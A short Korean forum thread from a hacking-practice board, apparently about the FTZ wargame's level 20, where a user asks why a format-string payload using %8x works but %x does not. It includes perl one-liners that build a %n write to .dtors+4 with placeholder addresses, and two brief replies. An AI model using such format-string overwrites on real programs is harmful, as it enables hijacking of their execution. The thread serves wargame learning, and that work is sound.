레벨 해킹

 2839, 1/142 회원가입  로그인  
   kumi123
   ftz level20

http://www.hackerschool.org/HS_Boards/zboard.php?AllArticle=true&no=3293 [복사]


20번을 푸는데 질문하나 드립니다.

.dtors+4에 값을 넣는 exploit이 ( 00은 주소

perl -e 'print "AAAA\x00\x00\x00\x00BBBB\x00\x00\x00\x00", "%8x %8x %8x %~!!@#x %n %!@#x %n"'

처럼하면 값이 맞게 들어가는데... (EGG로 햇을 시)

perl -e 'print "AAAA\x00\x00\x00\x00BBBB\x00\x00\x00\x00", "%x %x %x %~!!@#x %n %!@#x %n"'

%8x -> %x 로 바꾸고 값 조정해 줘도 돌아가야되는데 안돌아가네요 ???

  Hit : 3538     Date : 2013/05/22 09:50



    
qkrwncks593 \x00 은 NULL 문자입니다. 그래서 그뒤의 문자들은 저장되지않고 무시됩니다. 2013/05/23  
kumi123 그게 아니라... 00은 임의의 주소값이고, %x 는 안되는데 %8x는 되는 이유가 궁금합니다. 2013/05/25